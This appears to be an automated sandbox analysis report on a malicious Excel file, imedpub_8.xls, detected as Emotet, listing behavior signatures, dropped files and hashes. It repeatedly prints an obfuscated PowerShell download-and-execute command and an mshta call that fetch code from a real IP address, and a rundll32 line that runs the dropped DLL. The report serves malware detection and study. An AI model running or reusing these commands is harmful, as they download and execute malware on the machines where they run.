Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 1164

Thread sleep time: -300000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\ProgramData\JooSee.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000006.00000002.661397163.00000000000F5000.00000004.00000020.00020000.00000000.sdmp

Anti Debugging

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match	File source: imedpub_8.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

ID:	562400
Product:	CloudBasic
Start time:	20:57:39
Start date:	28.01.2022
Sample:	imedpub_8.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\JooSee.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0EA8275E9959D13E2DAE61B507BEFD0B	CBDBC5CC68469D500B9D2BEF0A5EFD7BCD2F9663	3FD5FF9B3428C603D79CFDFB8C11C7AFCABE8F575B09BE5946BE4C413DAFC83B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm	data	DD20B97330028BCB6BF98D97C47028D9	D58D97589A97FBD3B1216ED76C4918113F4B7B25	4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
C:\Users\user\AppData\Local\Temp\32B4.tmp	Composite Document File V2 Document, Cannot read section info	72F5C05B7EA8DD6059BF59F50B22DF33	D5AF52E129E15E3A34772806F6C5FBF132E7408E	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
C:\Users\user\AppData\Local\Temp\~DF3B12D0E9CF2F0062.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF9DFA6BFBFA953BEE.TMP	data	06A30014EFAE12913C829BE85DD271EC	D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D	2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)	data	1DC801BAB39D408109341647BDCD7F14	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5Z6VJ3ODJ5VBJVEIRD5.temp	data	1DC801BAB39D408109341647BDCD7F14	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
C:\Users\user\Desktop\imedpub_8.xls	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0	9327C4424E99C81EA3EA275D76AB38F4	59129100286164B88FD2A2673E23A71D07687EE4	F3CAA9710F8BF3AAC4E7C7584AD4023C00CCE6B06CEEBDF77C7B1CA2316248AC

Windows Analysis Report
imedpub_8.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report imedpub_8.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
imedpub_8.xls